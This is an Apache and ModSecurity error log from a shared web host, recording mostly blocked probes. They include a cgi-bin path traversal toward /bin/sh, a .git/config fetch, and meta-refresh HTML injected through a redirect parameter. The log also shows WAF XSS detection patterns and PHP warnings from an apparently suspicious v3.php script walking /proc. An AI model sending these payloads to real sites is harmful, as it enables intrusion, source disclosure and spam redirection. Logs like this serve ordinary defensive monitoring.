[Mon May 11 13:05:20.866577 2026] [security2:error] [pid 1254242:tid 1254254] [client 15.235.145.59:62117] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/postingchannel.com"] [unique_id "agG38L4KNmD_mZ_vlf9R7wAAAEk"], referer: https://www.piregwan-genesis.com
[Mon May 11 13:05:20.867078 2026] [security2:error] [pid 1254242:tid 1254254] [client 15.235.145.59:62117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/postingchannel.com"] [unique_id "agG38L4KNmD_mZ_vlf9R7wAAAEk"], referer: https://www.piregwan-genesis.com
[Mon May 11 13:05:20.867864 2026] [security2:error] [pid 1254242:tid 1254254] [client 15.235.145.59:62117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/postingchannel.com"] [unique_id "agG38L4KNmD_mZ_vlf9R7wAAAEk"], referer: https://www.piregwan-genesis.com
PHP Warning:  filesize(): stat failed for /proc/71/task/71/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/71/task/71/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/71/task/71/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/71/task/71/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/71/task/71/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/71/task/71/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:05:43.324260 2026] [core:error] [pid 1254212:tid 1254234] [client 66.249.75.101:37305] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:05:43.324694 2026] [core:error] [pid 1254212:tid 1254234] [client 66.249.75.101:37305] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:06:09.909292 2026] [authz_core:error] [pid 1254328:tid 1254340] [client 47.128.126.107:17952] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/Core/error_log
[Mon May 11 13:07:05.054280 2026] [:error] [pid 1254328:tid 1254352] [client 92.205.109.21:47214] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 13:07:44.587844 2026] [authz_core:error] [pid 1256241:tid 1256266] [client 111.225.148.201:49946] AH01630: client denied by server configuration: /home/piregwan/public_html/testmail/error_log
[Mon May 11 13:07:58.233469 2026] [authz_core:error] [pid 1254242:tid 1254263] [client 47.128.58.229:12734] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/namespaced/error_log
[Mon May 11 13:08:08.197967 2026] [security2:error] [pid 1254212:tid 1254228] [client 34.32.78.158:59940] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agG4mEYQeUtAPynIs6xvvgAAAA4"]
[Mon May 11 13:08:08.198469 2026] [security2:error] [pid 1254212:tid 1254228] [client 34.32.78.158:59940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agG4mEYQeUtAPynIs6xvvgAAAA4"]
[Mon May 11 13:08:08.198920 2026] [security2:error] [pid 1254212:tid 1254228] [client 34.32.78.158:59940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agG4mEYQeUtAPynIs6xvvgAAAA4"]
[Mon May 11 13:08:39.512321 2026] [core:error] [pid 1254212:tid 1254229] [client 66.249.79.130:53715] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:08:39.512798 2026] [core:error] [pid 1254212:tid 1254229] [client 66.249.79.130:53715] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:10:26.543004 2026] [security2:error] [pid 1254242:tid 1254260] [client 45.8.255.105:57997] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5Ir4KNmD_mZ_vlf9S_AAAAE8"], referer: https://www.piregwan-genesis.com/
[Mon May 11 13:10:49.401133 2026] [core:error] [pid 1256241:tid 1256268] [client 167.86.88.40:49668] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon May 11 13:10:49.406559 2026] [:error] [pid 1256241:tid 1256268] [client 167.86.88.40:49668] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 13:11:34.001102 2026] [authz_core:error] [pid 1254212:tid 1254215] [client 17.241.75.5:33610] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/customize/error_log
[Mon May 11 13:11:58.750276 2026] [security2:error] [pid 1254328:tid 1254344] [client 43.135.133.194:40124] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agG5fkRdw2n9wv6Ai48hKAAAAI0"], referer: http://www.missmandarine.com
[Mon May 11 13:12:17.121722 2026] [security2:error] [pid 1254179:tid 1254197] [client 193.58.104.19:33453] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5kWS6k_SCYd1AVZrI_AAAARA"], referer: https://www.piregwan-genesis.com/
[Mon May 11 13:12:28.876240 2026] [security2:error] [pid 1254133:tid 1254146] [client 86.105.185.48:26565] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5nBjZymfuKpjWXeiUxAAAAMo"], referer: https://www.piregwan-genesis.com/
[Mon May 11 13:12:48.516544 2026] [security2:error] [pid 1254328:tid 1254349] [client 194.233.64.127:59730] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https3a2fevolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9sn>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sERdw2n9wv6Ai48hTQAAAJM"]
[Mon May 11 13:12:48.518187 2026] [security2:error] [pid 1254328:tid 1254349] [client 194.233.64.127:59730] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn /> found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sERdw2n9wv6Ai48hTQAAAJM"]
[Mon May 11 13:12:48.519205 2026] [security2:error] [pid 1254328:tid 1254349] [client 194.233.64.127:59730] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn /> found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sERdw2n9wv6Ai48hTQAAAJM"]
[Mon May 11 13:12:48.519795 2026] [security2:error] [pid 1254328:tid 1254349] [client 194.233.64.127:59730] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sERdw2n9wv6Ai48hTQAAAJM"]
[Mon May 11 13:12:48.520292 2026] [security2:error] [pid 1254328:tid 1254349] [client 194.233.64.127:59730] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sERdw2n9wv6Ai48hTQAAAJM"]
[Mon May 11 13:12:48.520654 2026] [security2:error] [pid 1254328:tid 1254349] [client 194.233.64.127:59730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sERdw2n9wv6Ai48hTQAAAJM"]
[Mon May 11 13:12:48.521418 2026] [security2:error] [pid 1254328:tid 1254349] [client 194.233.64.127:59730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sERdw2n9wv6Ai48hTQAAAJM"]
[Mon May 11 13:12:49.184749 2026] [security2:error] [pid 1254242:tid 1254261] [client 194.233.64.127:59750] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https3a2fevolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9sn>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sb4KNmD_mZ_vlf9TiQAAAFA"]
[Mon May 11 13:12:49.185738 2026] [security2:error] [pid 1254242:tid 1254261] [client 194.233.64.127:59750] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn /> found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sb4KNmD_mZ_vlf9TiQAAAFA"]
[Mon May 11 13:12:49.186762 2026] [security2:error] [pid 1254242:tid 1254261] [client 194.233.64.127:59750] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn /> found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sb4KNmD_mZ_vlf9TiQAAAFA"]
[Mon May 11 13:12:49.189350 2026] [security2:error] [pid 1254242:tid 1254261] [client 194.233.64.127:59750] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sb4KNmD_mZ_vlf9TiQAAAFA"]
[Mon May 11 13:12:49.191097 2026] [security2:error] [pid 1254242:tid 1254261] [client 194.233.64.127:59750] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https3A2Fevolv.E.L.U.Pc@Haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9Sn>kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sb4KNmD_mZ_vlf9TiQAAAFA"]
[Mon May 11 13:12:49.191480 2026] [security2:error] [pid 1254242:tid 1254261] [client 194.233.64.127:59750] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sb4KNmD_mZ_vlf9TiQAAAFA"]
[Mon May 11 13:12:49.192400 2026] [security2:error] [pid 1254242:tid 1254261] [client 194.233.64.127:59750] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG5sb4KNmD_mZ_vlf9TiQAAAFA"]
[Mon May 11 13:13:18.975077 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:19.068058 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:19.889774 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
